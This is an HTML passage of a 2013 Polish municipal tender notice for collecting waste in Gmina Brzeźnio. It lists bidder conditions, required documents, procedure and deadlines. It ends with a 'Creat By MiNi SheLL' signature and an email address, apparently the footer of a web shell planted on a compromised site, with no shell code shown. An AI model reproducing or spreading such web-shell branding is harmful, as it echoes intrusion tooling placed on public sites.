3. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
4. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  zobowiązany jest wykazać , że:
a)	jest wpisany do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z wymogami Ustawy z dn. 13 września 1996 roku o utrzymaniu czystości i porządku w gminie (Dz. U.  z 2012 r., poz. 391),

b)	posiada aktualne zezwolenie na transport, zbieranie i przetwarzanie odpadów komunalnych zgodnie z wymogami Ustawy z dn. 27 kwietnia 2001   o odpadach (Dz. U.                   z 2010 roku nr 185, poz. 1243 ze zmianami) lub równoważne, w tym wydane na podstawie wcześniejszych przepisów

c)	jest wpisany do rejestru podmiotów zbierających zużyty sprzęt elektryczny                                i elektroniczny prowadzony przez Głównego Inspektora Ochrony Środowiska zgodnie z ustawą z dnia 29 lipca 2005 roku o zużytym sprzęcie elektrycznym i elektronicznym (Dz. U. Nr 180, poz. 1495 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie wykonał należycie usługę/-i odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia tj. usługi polegające na odbieraniu odpadów komunalnych z nieruchomości za kwotę brutto nie mniejszą niż 270.000,00 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  zobowiązany jest wykazać , że będzie dysponował na czas realizacji zadania:
- co najmniej 1 samochodem przystosowanym do odbierania zmieszanych odpadów komunalnych,
- co najmniej 1 samochodem przystosowanym do odbierania selektywnie zebranych odpadów komunalnych,
- co najmniej 1 pojazdem do odbierania odpadów komunalnych bez funkcji kompaktującej.

Pojazdy muszą być trwale i czytelnie oznakowanymi w widocznym miejscu nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości,
Pojazdy i urządzenia muszą być sprawne, spełniać wszelkie wymogi i parametry wymagane obowiązującym prawem i posiadać:
- odpowiednie dokumenty potwierdzające dopuszczenie do użytkowania,
- konstrukcję, która zabezpiecza przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz musi minimalizować oddziaływanie czynników atmosferycznych na odpady podczas ich transportu, przeładunku,
- pojazdy muszą być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników.

Wykonawca będzie dysponował na czas realizacji zadania bazą magazynowo - transportową:
- usytuowaną w gminie, z której terenu odbiera te odpady lub w odległości nie większej niż 60 km od granicy tej gminy,

- Zamawiający zastrzega sobie prawo do dokonania weryfikacji zgodności ze stanem faktycznym treści oświadczeń złożonych przez Wykonawcę na potwierdzenie spełniania warunku dotyczącego dysponowania potencjałem technicznym. W przypadku stwierdzenia naruszenia prawdziwości złożonych oświadczeń Zamawiający skorzysta z uprawnienia wynikającego z art. 24 ust. 2 pkt. 3 lub 4 Ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca wykaże posiadanie ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia na kwotę minimum 200.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Wzór formularza ofertowego - wypełniony i podpisany przez wykonawcę - załącznik nr 1 do SIWZ 

-  Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych - załącznik nr 2 do SIWZ

- zobowiązanie innych podmiotów do oddania do dyspozycji niezbędnego kapitału

- pełnomocnictwo do reprezentowania w postępowaniu

- dokument wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	 Zmiana postanowień zawartej umowy może nastąpić za zgoda obu stron wyrażoną na piśmie, pod rygorem nieważności.
2.	 Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty, gdy nastąpi:

a)	zmiany spowodowane następującymi okolicznościami:
- zmiana powszechnie obowiązujących przepisów prawa w zakresie mającymi wpływ na realizację zamówienia;
- konieczność wprowadzenia zmian będzie następstwem zmian stawki VAT, przy czym zmianie ulega kwota podatku VAT i kwota brutto;
- siła wyższa  uniemożliwiająca wykonanie przedmiotu umowy zgodnie z siwz;
- zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy 
w związku z wprowadzoną zmianą uchwały Rady Gminy w powyższej sprawie;
- podjecie przez zamawiającego decyzji o zmianie częstotliwości odbioru odpadów
-  zmiany w zakresie przeprowadzania kontroli realizowania przez właścicieli nieruchomości obowiązków w zakresie selektywnego zbierania odpadów komunalnych;
- zmiany wielkości pojemników do gromadzenia odpadów selektywnych;


b)	Zamawiający przewiduje wydłużenie terminu związania ofertą na okres nie dłuższy niż 
60 dni.
c)	Zamawiający przewiduje zmiany nazw, siedziby stron umowy, numerów kont bankowych i innych danych identyfikacyjnych.
d)	Zamawiający przewiduje zmiany form zabezpieczenia należytego wykonania umowy.
e)	Zamawiający przewiduje zmiany osób odpowiedzialnych za kontakty w sprawie przedmiotem umowy.
f)	Zamawiający przewiduje zmniejszenie zakresu wynagrodzenia z przyczyn                                    o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć.
g)	Zamawiający zastrzega możliwość zmiany lokalizacji PSZOK.
Dokonanie zmian, o których mowa powyżej wymaga podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brzeznio.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Brzeźnio, ul. Wspólna 44, 98-275 Brzeźno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2013 godzina 12:00, miejsce: Urząd Gminy Brzeźnio, ul. Wspólna 44, 98-275 Brzeźno, I piętro, sekretariat pok. nr 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com